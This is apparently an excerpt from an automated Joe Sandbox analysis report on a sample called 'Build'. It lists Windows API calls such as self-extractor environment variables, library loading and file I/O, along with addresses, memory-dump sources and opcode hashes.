                                                                                          • Opcode ID: 80aae1f4979312e277529b7f1deabe95613019dc895ce7f53a995e1f55e711b1
                                                                                          • Instruction ID: ae99ac6795973d3dffe5277c2ba2939022c038eea6b03d3f0e7535c61120d37b
                                                                                          • Opcode Fuzzy Hash: 80aae1f4979312e277529b7f1deabe95613019dc895ce7f53a995e1f55e711b1
                                                                                          • Instruction Fuzzy Hash: 18F0C831611314ABDB229B258C06F9FB7AC9F86B00F014059F945FB180D774EA058BA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1100 37ffdd-380011 call 381590 SetEnvironmentVariableW call 3723d6 1104 380016-38001a 1100->1104 1105 38001c-380020 1104->1105 1106 38003e-38004a call 3810f9 1104->1106 1107 380029-380030 call 3724f2 1105->1107 1112 380022-380028 1107->1112 1113 380032-380038 SetEnvironmentVariableW 1107->1113 1112->1107 1113->1106
                                                                                          APIs
                                                                                          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037FFFE
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00380038
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentVariable
                                                                                          • String ID: sfxcmd$sfxpar
                                                                                          • API String ID: 1431749950-3493335439
                                                                                          • Opcode ID: 87382865b1bed7796fb665aecda8c0caedda91676ad9bb9dfb3455f0640b9ec6
                                                                                          • Instruction ID: 6b49209f757ef866c18dd0ec7f80fe72047538a672d04ffaa73983f6621ecfdb
                                                                                          • Opcode Fuzzy Hash: 87382865b1bed7796fb665aecda8c0caedda91676ad9bb9dfb3455f0640b9ec6
                                                                                          • Instruction Fuzzy Hash: 33F0F6B5901324ABCB27BBA48C069BF739CEF0EB40B014096FD45AB181DAB59D41C7A1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1114 386232-386247 LoadLibraryExW 1115 386249-386252 GetLastError 1114->1115 1116 38627b-38627c 1114->1116 1117 386279 1115->1117 1118 386254-386268 call 3888f8 1115->1118 1117->1116 1118->1117 1121 38626a-386278 LoadLibraryExW 1118->1121
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,003861E3,00000000,00000001,003C60C8,?,?,?,00386386,00000004,InitializeCriticalSectionEx,00399624,InitializeCriticalSectionEx), ref: 0038623F
                                                                                          • GetLastError.KERNEL32(?,003861E3,00000000,00000001,003C60C8,?,?,?,00386386,00000004,InitializeCriticalSectionEx,00399624,InitializeCriticalSectionEx,00000000,?,0038613D), ref: 00386249
                                                                                          • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00385083), ref: 00386271
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: de0f3e900943bbafd186b06e2e2057470fdbf216fb0a084dc360ce6189864eba
                                                                                          • Instruction ID: 1f56f066a7e25838e21a2379c50b660e6650279048c1a1e0b4c403beea4612ba
                                                                                          • Opcode Fuzzy Hash: de0f3e900943bbafd186b06e2e2057470fdbf216fb0a084dc360ce6189864eba
                                                                                          • Instruction Fuzzy Hash: 03E04F30681304B7EF232F60EC07F593F79AB00B51F1108A1F94DA80E0EBA299509684
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B161
                                                                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B179
                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B1AB
                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,0036B662,?,?,00000000,?,?), ref: 0036B1CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                          • String ID:
                                                                                          • API String ID: 2244327787-0
                                                                                          • Opcode ID: 60c2b32cae39f2ea5b40e12754b378a01a3235c31888eb96c79f179142247695
                                                                                          • Instruction ID: 4449cd5260311f2b9e9b1c082dcd9438673480e7925187559993d2aaec027a30
                                                                                          • Opcode Fuzzy Hash: 60c2b32cae39f2ea5b40e12754b378a01a3235c31888eb96c79f179142247695
                                                                                          • Instruction Fuzzy Hash: D2117C30904618FBDB235F20C825A6AB7ADBB423A1F10C62AE826C5294DB71DEC4DF51
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0038688D,00000000,00000000,?,0038D32B,0038688D,00000000,00000000,00000000,?,0038D528,00000006,FlsSetValue), ref: 0038D3B6
                                                                                          • GetLastError.KERNEL32(?,0038D32B,0038688D,00000000,00000000,00000000,?,0038D528,00000006,FlsSetValue,0039AC00,FlsSetValue,00000000,00000364,?,0038BA77), ref: 0038D3C2
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0038D32B,0038688D,00000000,00000000,00000000,?,0038D528,00000006,FlsSetValue,0039AC00,FlsSetValue,00000000), ref: 0038D3D0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 3177248105-0
                                                                                          • Opcode ID: d396a2798e4ab12dd6c894c595f6194215bddf28a21d213a76eaace77ad48595
                                                                                          • Instruction ID: 8ded584d2c050ceeda3e7867da698f0c9ff4d43686b739ea34d0a4b2436e8904
                                                                                          • Opcode Fuzzy Hash: d396a2798e4ab12dd6c894c595f6194215bddf28a21d213a76eaace77ad48595
                                                                                          • Instruction Fuzzy Hash: BE01F73A212726ABCB236B699C85A57375CEF047A1B220660F956D72C0CB61D800C7E1
                                                                                          APIs
                                                                                            • Part of subcall function 0038B9A5: GetLastError.KERNEL32(?,003A50C4,00386E12,003A50C4,?,?,0038688D,?,?,003A50C4), ref: 0038B9A9
                                                                                            • Part of subcall function 0038B9A5: _free.LIBCMT ref: 0038B9DC
                                                                                            • Part of subcall function 0038B9A5: SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA1D
                                                                                            • Part of subcall function 0038B9A5: _abort.LIBCMT ref: 0038BA23
                                                                                            • Part of subcall function 0038E19E: _abort.LIBCMT ref: 0038E1D0
                                                                                            • Part of subcall function 0038E19E: _free.LIBCMT ref: 0038E204
                                                                                            • Part of subcall function 0038DE0B: GetOEMCP.KERNEL32(00000000,?,?,0038E094,?), ref: 0038DE36
                                                                                          • _free.LIBCMT ref: 0038E0EF
                                                                                          • _free.LIBCMT ref: 0038E125
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorLast_abort
                                                                                          • String ID: p,:
                                                                                          • API String ID: 2991157371-1418527582
                                                                                          • Opcode ID: 4493291ebe86d4135014a5d3b99d1fcb71b74ebad69bfcb837bdb4159d192adf
                                                                                          • Instruction ID: 4bf94a18f65e0fc82179f7ba3d2caa1fb32ed45150c3be5b5ed5887bbb9293b1
                                                                                          • Opcode Fuzzy Hash: 4493291ebe86d4135014a5d3b99d1fcb71b74ebad69bfcb837bdb4159d192adf
                                                                                          • Instruction Fuzzy Hash: 6C31C271904309AFDB12FFAAD445AADB7F5EF41320F2540E9E4049B291EBB69D41CB50
                                                                                          APIs
                                                                                            • Part of subcall function 003712F6: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00371315
                                                                                            • Part of subcall function 003712F6: GetProcAddress.KERNEL32(003AC1F0,CryptUnprotectMemory), ref: 00371325
                                                                                          • GetCurrentProcessId.KERNEL32(?,00000200,?,00371366), ref: 003713F9
                                                                                          Strings
                                                                                          • CryptProtectMemory failed, xrefs: 003713B0
                                                                                          • CryptUnprotectMemory failed, xrefs: 003713F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                          • API String ID: 2190909847-396321323
                                                                                          • Opcode ID: 293c2d5081e006e63cd15b66af5e08fe2222c870fa425523de1e98cfb5b44a86
                                                                                          • Instruction ID: 7476706a732f7fb9973538b8ee8dbeb79e2a4101e333ff3e8f77eee8c54e7000
                                                                                          • Opcode Fuzzy Hash: 293c2d5081e006e63cd15b66af5e08fe2222c870fa425523de1e98cfb5b44a86
                                                                                          • Instruction Fuzzy Hash: 94115936601224ABEF37AB2ADC0296E3B7CEF01724B01C126FC156F253D6389D4187D0
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00373129
                                                                                          • SetThreadPriority.KERNEL32(00000000,00000000), ref: 00373170
                                                                                            • Part of subcall function 00367BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00367BD5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                          • String ID: CreateThread failed
                                                                                          • API String ID: 2655393344-3849766595
                                                                                          • Opcode ID: 490ee1374e8bce1464c6a7f59dce4c27c5f6100578a7e4b787809649890db588
                                                                                          • Instruction ID: 736e7c3cd4dbdacc1795971fb46a576b7e3d739d65c0575c47d5e07966542357
                                                                                          • Opcode Fuzzy Hash: 490ee1374e8bce1464c6a7f59dce4c27c5f6100578a7e4b787809649890db588
                                                                                          • Instruction Fuzzy Hash: B90149B53083066FD333BF50DC82FA277A8EB42711F20412EF6855B1C0CAE1A8409664
                                                                                          APIs
                                                                                            • Part of subcall function 0038E580: GetEnvironmentStringsW.KERNEL32 ref: 0038E589
                                                                                            • Part of subcall function 0038E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038E5AC
                                                                                            • Part of subcall function 0038E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038E5D2
                                                                                            • Part of subcall function 0038E580: _free.LIBCMT ref: 0038E5E5
                                                                                            • Part of subcall function 0038E580: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038E5F4
                                                                                          • _free.LIBCMT ref: 0038AB00
                                                                                          • _free.LIBCMT ref: 0038AB07
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                          • String ID: pb<
                                                                                          • API String ID: 400815659-3541353696
                                                                                          • Opcode ID: 2b82d84a6000f6baa6cb3c145b8e35a29d9a545370c364746845c97d814cd6a2
                                                                                          • Instruction ID: 4bb54f7250401fd01e6a5d2b36bb1b2788675c9f4dd21fcbd42f89de77147233
                                                                                          • Opcode Fuzzy Hash: 2b82d84a6000f6baa6cb3c145b8e35a29d9a545370c364746845c97d814cd6a2
                                                                                          • Instruction Fuzzy Hash: 0CE0E512A05B1156F76B767FAC03EAB01298F82370B1106DBF521CF5C2EE988C015393
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00367BEB,?,00361436,00367BEB), ref: 003705F8
                                                                                          • LoadStringW.USER32(00367BEB,?,00361436), ref: 0037060F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString
                                                                                          • String ID: pP:
                                                                                          • API String ID: 2948472770-3607573924
                                                                                          • Opcode ID: 23c230ae01d44915159d12ab8280d60b49f3053ee44bf191ac3a1abb281c9343
                                                                                          • Instruction ID: dbc37232444ac0b5b26ed2623a2185a9d7aedc51944dc94a6d458615ef28f5e1
                                                                                          • Opcode Fuzzy Hash: 23c230ae01d44915159d12ab8280d60b49f3053ee44bf191ac3a1abb281c9343
                                                                                          • Instruction Fuzzy Hash: 71F0DF35101218FB8F125F55EC18CAB7F6EFF4A394B048025FD0886121D2329860ABA0
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0036F306,00000001,?,?,?,00000000,00377564,?,?,?,?), ref: 0036B9DE
                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0036BA25
                                                                                          • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0036F306,00000001,?,?,?), ref: 0036BA51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$Handle
                                                                                          • String ID:
                                                                                          • API String ID: 4209713984-0
                                                                                          • Opcode ID: 5347f34eb0a4de51bbe4f4957c12e7d5aab28ae5022e95119e3c240eb6d1810e
                                                                                          • Instruction ID: cea9f06a25f1d672e2f1f3acd05cdd311c72ce6def6231b2582e03da147aa37f
                                                                                          • Opcode Fuzzy Hash: 5347f34eb0a4de51bbe4f4957c12e7d5aab28ae5022e95119e3c240eb6d1810e
                                                                                          • Instruction Fuzzy Hash: FB31F571208305AFDB16CF14D848B6BB7A9FF81715F00891DF5819B294CB759D88CFA2
                                                                                          APIs
                                                                                            • Part of subcall function 0036E1EC: _wcslen.LIBCMT ref: 0036E1F2
                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,0036BBD0,?,00000001,00000000,?,?), ref: 0036BF12
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,0036BBD0,?,00000001,00000000,?,?), ref: 0036BF45
                                                                                          • GetLastError.KERNEL32(?,?,?,00000000,0036BBD0,?,00000001,00000000,?,?), ref: 0036BF62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 2260680371-0
                                                                                          • Opcode ID: 67db24c6499a5787b527c3994d719f91ee233303c62b52f28faeaa5cdf6223ce
                                                                                          • Instruction ID: c101d5f4c0db57afc364013f979fe6a6287aa2cf9fb50b1c7c02f2817ac89c0c
                                                                                          • Opcode Fuzzy Hash: 67db24c6499a5787b527c3994d719f91ee233303c62b52f28faeaa5cdf6223ce
                                                                                          • Instruction Fuzzy Hash: FB11A131205214AADB13AB748C46BFEB79C9F0A740F018465F901DE1A5DB25DEC1CE65
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0038DF08
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: Info
                                                                                          • String ID:
                                                                                          • API String ID: 1807457897-3916222277
                                                                                          • Opcode ID: 19b72f5185c1b293f8c6ff9388b9fbb405c2e660e374a07c8c0d09948a05f37c
                                                                                          • Instruction ID: cd77947d9ca517cfddd514bd2ef4bc75384d1307fe9460da88c4ee926ea52e9e
                                                                                          • Opcode Fuzzy Hash: 19b72f5185c1b293f8c6ff9388b9fbb405c2e660e374a07c8c0d09948a05f37c
                                                                                          • Instruction Fuzzy Hash: 99410AB05083889BDF239F658C84BF6BBBEDF45304F1408EDE59A87182D675AA45DF20
                                                                                          APIs
                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0038D62D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true
                                                                                          • Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_360000_Build.jbxd
                                                                                          Similarity
                                                                                          • API ID: String
                                                                                          • String ID: LCMapStringEx
                                                                                          • API String ID: 2568140703-3893581201
                                                                                          • Opcode ID: cfda40ff527d354ee19806f5f721d65cb00d8878e638a6246556db927589a544
                                                                                          • Instruction ID: 49b5b0a7f36c3d6e8b05564743ebc644bac02f04b971af72630410dac9eff382
                                                                                          • Opcode Fuzzy Hash: cfda40ff527d354ee19806f5f721d65cb00d8878e638a6246556db927589a544
                                                                                          • Instruction Fuzzy Hash: 4101133250420DBBCF036F90DD02DEE7F66EF48710F404155FE08691A1C6328931AB81
                                                                                          APIs
                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0038CBBF), ref: 0038D5A5
                                                                                          Strings
                                                                                          Memory Dump Source
